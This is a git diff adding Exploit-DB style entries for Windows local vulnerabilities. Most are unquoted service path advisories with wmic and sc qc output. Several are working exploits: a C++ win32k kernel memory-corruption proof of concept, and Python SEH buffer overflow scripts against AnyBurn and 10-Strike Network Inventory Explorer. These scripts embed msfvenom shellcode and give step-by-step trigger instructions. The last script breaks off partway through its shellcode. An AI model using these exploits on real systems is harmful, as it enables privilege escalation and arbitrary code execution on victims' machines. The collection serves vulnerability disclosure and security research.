+Asus GiftBox Desktop	ASUSGiftBoxDekstop	C:\Program Files (x86)\ASUS\ASUS GIFTBOX Desktop\ASUSGIFTBOXDesktop.exe		Auto 
+
+# Service info:
+
+C:\>sc qc ASUSGiftBoxDekstop
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ASUSGiftBoxDekstop
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\ASUS GIFTBOX Desktop\ASUSGIFTBOXDesktop.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Asus GiftBox Desktop
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the 
+# system root path undetected by the OS or other security applications where it could 
+# potentially be executed during application startup or reboot. If successful, the local 
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48174.txt b/exploits/windows/local/48174.txt
new file mode 100644
index 000000000..59f45c92d
--- /dev/null
+++ b/exploits/windows/local/48174.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Deep Instinct Windows Agent 1.2.29.0 - 'DeepMgmtService' Unquoted Service Path
+# Discovery by: Oscar Flores
+# Discovery Date: 2020-03-05
+# Vendor Homepage: https://www.deepinstinct.com/
+# Software Links : https://www.deepinstinct.com/2019/05/22/hp-collaborates-with-deep-instinct-to-roll-out-ai-powered-malware-protection-for-next-generation-hp-elitebook-and-zbook-pcs/
+# https://press.ext.hp.com/us/en/press-releases/2019/hp-elevates-premium-and-personalized-pc-experiences-for-leaders-and-creators.html 
+# Tested Version: 1.2.29.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro 64 bits
+ 
+# Step to discover Unquoted Service Path: 
+ 
+C:\>wmic service get displayname,pathname,name | findstr /i "deepmgmtservice"
+Deep Instinct Management Service	DeepMgmtService		C:\Program Files\HP Sure Sense\DeepMgmtService.exe
+ 
+# Service info:
+ 
+C:\>sc qc DeepMgmtService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: DeepMgmtService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\HP Sure Sense\DeepMgmtService.exe
+        LOAD_ORDER_GROUP   : FSFilter Anti-Virus
+        TAG                : 0
+        DISPLAY_NAME       : Deep Instinct Management Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the 
+# system root path undetected by the OS or other security applications where it could 
+# potentially be executed during application startup or reboot. If successful, the local 
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48180.cpp b/exploits/windows/local/48180.cpp
new file mode 100644
index 000000000..ca2a0d679
--- /dev/null
+++ b/exploits/windows/local/48180.cpp
@@ -0,0 +1,59 @@
+#include <cstdio>
+#include <windows.h>
+
+extern "C" NTSTATUS NtUserMessageCall(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);
+
+int main() {    
+    HINSTANCE hInstance = GetModuleHandle(NULL);
+
+    WNDCLASSEX wcx;
+    ZeroMemory(&wcx, sizeof(wcx));
+    wcx.hInstance = hInstance;
+    wcx.cbSize = sizeof(wcx);
+    wcx.lpszClassName = L"SploitWnd";
+    wcx.lpfnWndProc = DefWindowProc;
+    wcx.cbWndExtra = 8; //pass check in xxxSwitchWndProc to set wnd->fnid = 0x2A0
+   
+    printf("[*] Registering window\n");
+    ATOM wndAtom = RegisterClassEx(&wcx);
+    if (wndAtom == INVALID_ATOM) {
+        printf("[-] Failed registering SploitWnd window class\n");
+        exit(-1);
+    }
+
+    printf("[*] Creating instance of this window\n");
+    HWND sploitWnd = CreateWindowEx(0, L"SploitWnd", L"", WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);
+    if (sploitWnd == INVALID_HANDLE_VALUE) {
+        printf("[-] Failed to create SploitWnd window\n");
+        exit(-1);
+    }
+
+    printf("[*] Calling NtUserMessageCall to set fnid = 0x2A0 on window\n");
+    NtUserMessageCall(sploitWnd, WM_CREATE, 0, 0, 0, 0xE0, 1);
+
+    printf("[*] Allocate memory to be used for corruption\n");
+    PVOID mem = VirtualAlloc(0, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+    printf("\tptr: %p\n", mem);
+    PBYTE byteView = (PBYTE)mem;
+    byteView[0x6c] = 1;             // use GetKeyState in xxxPaintSwitchWindow
+
+    //pass DrawSwitchWndHilite double dereference
+    PVOID* ulongView = (PVOID*)mem;
+    ulongView[0x20 / sizeof(PVOID)] = mem;
+
+    printf("[*] Calling SetWindowLongPtr to set window extra data, that will be later dereferenced\n");
+    SetWindowLongPtr(sploitWnd, 0, (LONG_PTR)mem);
+    printf("[*] GetLastError = %x\n", GetLastError());
+
+    printf("[*] Creating switch window #32771, this has a result of setting (gpsi+0x154) = 0x130\n");
+    HWND switchWnd = CreateWindowEx(0, (LPCWSTR)0x8003, L"", 0, 0, 0, 0, 0, NULL, NULL, hInstance, NULL);
+
+    printf("[*] Simulating alt key press\n");
+    BYTE keyState[256];
+    GetKeyboardState(keyState);
+    keyState[VK_MENU] |= 0x80;
+    SetKeyboardState(keyState);
+
+    printf("[*] Triggering dereference of wnd->extraData by calling NtUserMessageCall second time");
+    NtUserMessageCall(sploitWnd, WM_ERASEBKGND, 0, 0, 0, 0x0, 1);
+}
\ No newline at end of file
diff --git a/exploits/windows/local/48193.txt b/exploits/windows/local/48193.txt
new file mode 100644
index 000000000..13f5f76b9
--- /dev/null
+++ b/exploits/windows/local/48193.txt
@@ -0,0 +1,34 @@
+# Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-10
+# Vendor Homepage: https://www.asus.com/
+# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
+# Tested Version: 1.02.00
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 en
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asComSvc" | findstr /i /v """
+ASUS Com Service                                                                    asComSvc                                  C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe                                                                       Auto
+
+C:\>sc qc asComSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: asComSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ASUS Com Service
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48206.txt b/exploits/windows/local/48206.txt
new file mode 100644
index 000000000..d07245513
--- /dev/null
+++ b/exploits/windows/local/48206.txt
@@ -0,0 +1,34 @@
+# Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-11
+# Vendor Homepage: https://www.asus.com/
+# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
+# Tested Version: 1.00.22
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 en
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asHmComSvc" | findstr /i /v """
+ASUS HM Com Service                                                                 asHmComSvc                                C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe                                                                                    Auto
+
+C:\>sc qc asHmComSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: asHmComSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ASUS HM Com Service
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48211.py b/exploits/windows/local/48211.py
new file mode 100755
index 000000000..a79f3e927
--- /dev/null
+++ b/exploits/windows/local/48211.py
@@ -0,0 +1,125 @@
+# Exploit Title: AnyBurn 4.8 - Buffer Overflow (SEH)
+# Date: 2020-03-09
+# Vendor Homepage: http://www.anyburn.com/
+# Software Link : http://www.anyburn.com/anyburn_setup.exe
+# Exploit Authors: "Richard Davy/Gary Nield"
+# Tested Version: 4.8 (32-bit)
+# Tested on: Windows 10 Enterprise x64
+# Vulnerability Type: Buffer Overflow/SEH/Unicode
+
+# Steps to Produce the Exploit:
+# 1.- Run python code
+# 2.- Open payload.txt and copy content to clipboard
+# 3.- Open AnyBurn choose 'Copy disk to image file'
+# 4.- Paste the content of payload.txt into the field: 'Select image file name'
+# 5.- Click 'Create Now' and you will see a crash and the payload launch.
+
+#!/usr/bin/env python
+
+#Set overall payload size
+crash_buffer_size = 10000
+#nseh offset for SEH overwrite
+nseh_offset = 9197
+
+#location in payload where stack alignment returns to for payload
+payloadret = 4459	
+#payload filler
+junk = "\x71" * payloadret 
+
+#Payload generated via msfvenom, easily changeable as padding is auto calculated
+#msfvenom -a x86 -p windows/exec cmd=calc.exe -e x86/unicode_upper BufferRegister=EAX -f py
+buf =  b""
+buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
+buf += b"\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
+buf += b"\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
+buf += b"\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
+buf += b"\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
+buf += b"\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
+buf += b"\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
+buf += b"\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
+buf += b"\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
+buf += b"\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
+buf += b"\x4c\x5a\x48\x44\x42\x4d\x30\x4b\x50\x4b\x50\x43\x30"
+buf += b"\x44\x49\x49\x55\x50\x31\x49\x30\x43\x34\x54\x4b\x50"
+buf += b"\x50\x50\x30\x44\x4b\x42\x32\x4c\x4c\x54\x4b\x42\x32"
+buf += b"\x4c\x54\x34\x4b\x43\x42\x4d\x58\x4c\x4f\x46\x57\x4f"
+buf += b"\x5a\x4d\x56\x30\x31\x4b\x4f\x56\x4c\x4f\x4c\x33\x31"
+buf += b"\x43\x4c\x4c\x42\x4e\x4c\x4f\x30\x49\x31\x48\x4f\x4c"
+buf += b"\x4d\x4d\x31\x49\x37\x5a\x42\x4c\x32\x50\x52\x50\x57"
+buf += b"\x44\x4b\x30\x52\x4c\x50\x34\x4b\x50\x4a\x4f\x4c\x54"
+buf += b"\x4b\x50\x4c\x4c\x51\x54\x38\x5a\x43\x31\x38\x4b\x51"
+buf += b"\x48\x51\x32\x31\x44\x4b\x42\x39\x4d\x50\x4b\x51\x59"
+buf += b"\x43\x54\x4b\x51\x39\x4d\x48\x4b\x33\x4f\x4a\x4f\x59"
+buf += b"\x44\x4b\x30\x34\x44\x4b\x4d\x31\x5a\x36\x30\x31\x4b"
+buf += b"\x4f\x56\x4c\x57\x51\x58\x4f\x4c\x4d\x4b\x51\x39\x37"
+buf += b"\x4f\x48\x39\x50\x34\x35\x4b\x46\x4d\x33\x33\x4d\x4b"
+buf += b"\x48\x4f\x4b\x33\x4d\x4f\x34\x43\x45\x4b\x34\x42\x38"
+buf += b"\x44\x4b\x51\x48\x4e\x44\x4b\x51\x59\x43\x31\x56\x54"
+buf += b"\x4b\x4c\x4c\x30\x4b\x44\x4b\x50\x58\x4d\x4c\x4d\x31"
+buf += b"\x38\x53\x34\x4b\x4b\x54\x44\x4b\x4d\x31\x5a\x30\x53"
+buf += b"\x59\x51\x34\x4e\x44\x4d\x54\x51\x4b\x31\x4b\x43\x31"
+buf += b"\x52\x39\x51\x4a\x30\x51\x4b\x4f\x49\x50\x51\x4f\x51"
+buf += b"\x4f\x30\x5a\x34\x4b\x4c\x52\x4a\x4b\x34\x4d\x51\x4d"
+buf += b"\x31\x5a\x4b\x51\x34\x4d\x35\x35\x46\x52\x4b\x50\x4d"
+buf += b"\x30\x4b\x50\x30\x50\x51\x58\x4e\x51\x44\x4b\x42\x4f"
+buf += b"\x33\x57\x4b\x4f\x59\x45\x47\x4b\x5a\x50\x38\x35\x36"
+buf += b"\x42\x32\x36\x52\x48\x37\x36\x45\x45\x47\x4d\x45\x4d"
+buf += b"\x4b\x4f\x48\x55\x4f\x4c\x4d\x36\x53\x4c\x4c\x4a\x35"
+buf += b"\x30\x4b\x4b\x39\x50\x42\x55\x4c\x45\x57\x4b\x4f\x57"
+buf += b"\x4d\x43\x52\x52\x32\x4f\x42\x4a\x4d\x30\x42\x33\x4b"
+buf += b"\x4f\x4a\x35\x32\x43\x51\x51\x42\x4c\x52\x43\x4e\x4e"
+buf += b"\x53\x35\x42\x58\x52\x45\x4d\x30\x41\x41"
+
+#Filler padding after payload code to bring us to nseh offset
+#auto calculated in case payload size changes
+junk1 = "\x71" * int(nseh_offset-(len(junk)+len(buf)))
+
+#SEH Overwrite
+nSeh = "\x61\x70"
+#Unicode safe SEH return
+seh = "\x09\x48"
+
+#Stack realignment which takes us directly back into shellcode
+eax_align =  "\x70\x71\x71\x71" 	 	
+eax_align += "\x54" 					
+eax_align += "\x47" 					
+eax_align += "\x58"						
+eax_align += "\x47" 					
+eax_align += "\x05\x2F\x11" 			
+eax_align += "\x47" 					
+eax_align += "\x2d\x01\x11" 			
+eax_align += "\x47" 					
+eax_align += "\x50" 					
+eax_align += "\x47"						
+eax_align += "\xc3"						
+
+#Padding to take us to 10,000 
+padding = "\x71" * int(crash_buffer_size-(len(junk)+len(buf)+len(junk1)+len(nSeh)+len(seh)+len(eax_align)))
+
+#Assembly of parts 
+buffer=junk+buf+junk1+nSeh+seh+eax_align+padding
+
+try:
+	f=open("payload.txt","w")
+	print "\nAnyBurn Version 4.8 (32-bit) Exploit\n"
+	print "Software Link : http://www.anyburn.com/anyburn_setup.exe"
+	print "Exploit Authors: Richard Davy/Gary Nield"
+	print "Tested on: Windows 10 Enterprise x64"
+	print "Vulnerability Type: Buffer Overflow/SEH/Unicode\n"
+
+	print "Steps to Produce the Exploit:"
+	print "1.- Run python code"
+	print "2.- Open payload.txt and copy content to clipboard"
+	print "3.- Open AnyBurn choose 'Copy disk to image file'"
+	print "4.- Paste the content of payload.txt into the field: 'Select image file name'"
+	print "5.- Click 'Create Now' and you will see a crash and the payload launch.\n"
+
+	print "[+] Creating %s bytes evil payload " %len(buffer)
+	
+	f.write(buffer)
+	f.close()
+
+	print "[+] File payload.txt created..."
+
+except:
+	print "[!] File cannot be created..."
\ No newline at end of file
diff --git a/exploits/windows/local/48227.txt b/exploits/windows/local/48227.txt
new file mode 100644
index 000000000..e94bdba1e
--- /dev/null
+++ b/exploits/windows/local/48227.txt
@@ -0,0 +1,35 @@
+# Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path
+# Discovery by: Alan Mondragon "El Masas"
+# Discovery Date: 2020-03-17
+# Vendor Homepage: https://www.veritas.com/
+# Software Link : https://www.veritas.com/
+# Veritas
+# Tested Version: 7.0
+# Vulnerability Type: Unquoted t Service Path
+# Tested on OS: Windows Server 2008 R2 en
+
+# Step to discover Unquoted Service Path: 
+
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """                                                                                                                                                                                                   Auto
+NetBackup Client Service NetBackup INET Daemon
+                      C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe
+                                                    Auto
+C:\>sc qc "NetBackup INET Daemon"
+[SC] QueryServiceConfig SUCCESS
+        SERVICE_NAME: NetBackup INET Daemon                                                                                                                                                                    
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Veritas\NetBackup\bin\bpinetd.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : NetBackup Client Service
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48246.txt b/exploits/windows/local/48246.txt
new file mode 100644
index 000000000..b6866889c
--- /dev/null
+++ b/exploits/windows/local/48246.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path
+# Discovery by: Víctor García
+# Discovery Date: 2020-03-23
+# Vendor Homepage: https://veyon.io/
+# Software Link:
+https://github.com/veyon/veyon/releases/download/v4.3.4/veyon-4.3.4.0-win64-setup.exe
+# Tested Version: 4.3.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Pro x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "C:\Windows\\" |findstr /i /v """
+Veyon Service     VeyonService     C:\Program Files\Veyon\veyon-service.exe
+
+
+# Service info:
+
+C:\>sc qc VeyonService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VeyonService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Veyon\veyon-service.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Veyon Service
+        DEPENDENCIES       : Tcpip
+                           : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the
+# system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48249.txt b/exploits/windows/local/48249.txt
new file mode 100644
index 000000000..0b99cb7aa
--- /dev/null
+++ b/exploits/windows/local/48249.txt
@@ -0,0 +1,37 @@
+# Exploit Title: AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-24
+# Vendor Homepage:https://www.avast.com/
+# Software Link :https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
+# Tested Version: 5.5.522.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 Single Language x32 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | f
+indstr /i /v "C:\Windows\\" | findstr /i "Avast SecureLine" | findstr /i /v """
+Avast SecureLine
+         SecureLine                       C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe                                         
+                                                       Auto
+
+C:\>sc qc SecureLine
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SecureLine
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Avast SecureLine
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+
+# Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48251.txt b/exploits/windows/local/48251.txt
new file mode 100644
index 000000000..1e7db5c21
--- /dev/null
+++ b/exploits/windows/local/48251.txt
@@ -0,0 +1,37 @@
+# Exploit Title: 10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path
+# Date: 2020-03-24
+# Author: Felipe Winsnes
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Version: 8.54
+# Tested on: Windows 7
+
+# Step to discover Unquoted Service Path: 
+
+C:\Users\IEUser>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
+srvInventoryWebServer     srvInventoryWebServer     C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe             Auto
+
+# Service info:
+
+C:\>sc qc srvInventoryWebServer
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: srvInventoryWebServer
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\10-Strike Network Inventory Explorer\InventoryWebServer.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : srvInventoryWebServer
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the
+# system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/48253.py b/exploits/windows/local/48253.py
new file mode 100755
index 000000000..ba2e52d64
--- /dev/null
+++ b/exploits/windows/local/48253.py
@@ -0,0 +1,69 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)
+# Date: 2020-03-24
+# Author: Felipe Winsnes
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Version: 8.54
+# Tested on: Windows 7
+
+# Proof of Concept:
+# 1.- Run the python script "poc.py", it will create a new file "poc.txt"
+# 2.- Copy the content of the new file 'poc.txt' to clipboard
+# 3.- Open the Application
+# 4.- Go to 'Main' or 'Computers'
+# 5.- Click upon 'Add'
+# 6.- Paste clipboard on 'Computer' parameter, under the title "Computer Card"
+# 7.- Click "OK"
+# 8.- Profit
+
+# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Strike-Network-Inventory-Explorer-Structered-Exception-Handling-Overwrite/
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed 
+# Payload size: 448 bytes
+
+buf =  b""
+buf += b"\x89\xe2\xda\xc3\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x39\x6c\x78\x68\x4f"
+buf += b"\x72\x47\x70\x63\x30\x57\x70\x63\x50\x4d\x59\x4b\x55"
+buf += b"\x55\x61\x49\x50\x45\x34\x6c\x4b\x50\x50\x36\x50\x4c"
+buf += b"\x4b\x53\x62\x56\x6c\x4e\x6b\x33\x62\x44\x54\x4e\x6b"
+buf += b"\x42\x52\x54\x68\x74\x4f\x68\x37\x50\x4a\x56\x46\x44"
+buf += b"\x71\x49\x6f\x6e\x4c\x45\x6c\x63\x51\x53\x4c\x53\x32"
+buf += b"\x76\x4c\x61\x30\x5a\x61\x58\x4f\x74\x4d\x76\x61\x49"
+buf += b"\x57\x59\x72\x5a\x52\x46\x32\x56\x37\x6c\x4b\x30\x52"
+buf += b"\x36\x70\x6c\x4b\x73\x7a\x57\x4c\x4c\x4b\x30\x4c\x64"
+buf += b"\x51\x70\x78\x7a\x43\x33\x78\x75\x51\x68\x51\x70\x51"
+buf += b"\x4c\x4b\x76\x39\x55\x70\x67\x71\x38\x53\x4e\x6b\x31"
+buf += b"\x59\x66\x78\x38\x63\x45\x6a\x51\x59\x6c\x4b\x70\x34"
+buf += b"\x4c\x4b\x57\x71\x59\x46\x45\x61\x59\x6f\x6e\x4c\x4b"
+buf += b"\x71\x58\x4f\x66\x6d\x76\x61\x5a\x67\x56\x58\x6b\x50"
+buf += b"\x73\x45\x49\x66\x75\x53\x71\x6d\x4c\x38\x37\x4b\x43"
+buf += b"\x4d\x67\x54\x63\x45\x4b\x54\x52\x78\x6c\x4b\x73\x68"
+buf += b"\x37\x54\x56\x61\x69\x43\x73\x56\x4c\x4b\x76\x6c\x32"
+buf += b"\x6b\x6e\x6b\x61\x48\x65\x4c\x55\x51\x7a\x73\x6c\x4b"
+buf += b"\x54\x44\x4e\x6b\x43\x31\x6a\x70\x4b\x39\x32\x64\x35"
+buf += b"\x74\x55\x74\x63\x6b\x43\x6b\x75\x31\x72\x79\x73\x6a"
+buf += b"\x56\x31\x59\x6f\x4b\x50\x53\x6f\x51\x4f\x43\x6a\x4c"
+buf += b"\x4b\x62\x32\x6a\x4b\x4c\x4d\x43\x6d\x63\x5a\x76\x61"
+buf += b"\x6e\x6d\x6d\x55\x4e\x52\x53\x30\x77\x70\x55\x50\x76"
+buf += b"\x30\x32\x48\x70\x31\x6c\x4b\x50\x6f\x6f\x77\x69\x6f"
+buf += b"\x58\x55\x4d\x6b\x4a\x50\x58\x35\x4e\x42\x42\x76\x75"
+buf += b"\x38\x6f\x56\x6f\x65\x4d\x6d\x6d\x4d\x59\x6f\x39\x45"
+buf += b"\x77\x4c\x76\x66\x73\x4c\x76\x6a\x4d\x50\x79\x6b\x4d"
+buf += b"\x30\x70\x75\x37\x75\x6f\x4b\x53\x77\x67\x63\x73\x42"
+buf += b"\x72\x4f\x50\x6a\x55\x50\x56\x33\x39\x6f\x39\x45\x45"
+buf += b"\x33\x30\x61\x50\x6c\x70\x63\x34\x6e\x42\x45\x51\x68"
+buf += b"\x31\x75\x65\x50\x41\x41"
+
+nseh = struct.pack("<I", 0x909006EB)
+seh = struct.pack("<I", 0x61E8497A) # 0x61e8497a : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files\10-Strike Network Inventory Explorer\sqlite3.dll)
+
+buffer = "A" * 211 + nseh + seh + "A" * 20 + buf + "\xff" * 200
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48257.py b/exploits/windows/local/48257.py
new file mode 100755
index 000000000..f355d8d4d
--- /dev/null
+++ b/exploits/windows/local/48257.py
@@ -0,0 +1,76 @@
+# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)
+# Date: 2020-03-26
+# Author: Felipe Winsnes
+# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
+# Version: 2.7.3.700
+# Tested on: Windows 7 (x86)
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file "poc.txt"
+# 2.- Copy the content of the new file 'poc.txt' to clipboard
+# 3.- Open the Application
+# 4.- If the 'Preferences' windows pops up, just click 'Cancel'
+# 4.- Click 'Batch'
+# 5.- Delete everything on the parameter 'Input:' and paste the clipboard there
+# 6.- Select OK
+# 7.- Some Windows message boxes will pop up, click OK.
+# 8.- Profit
+
+# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/
+
+import struct
+import sys
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
+# Payload size: 447 bytes
+
+buf =  b""
+buf += b"\xdb\xc4\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"
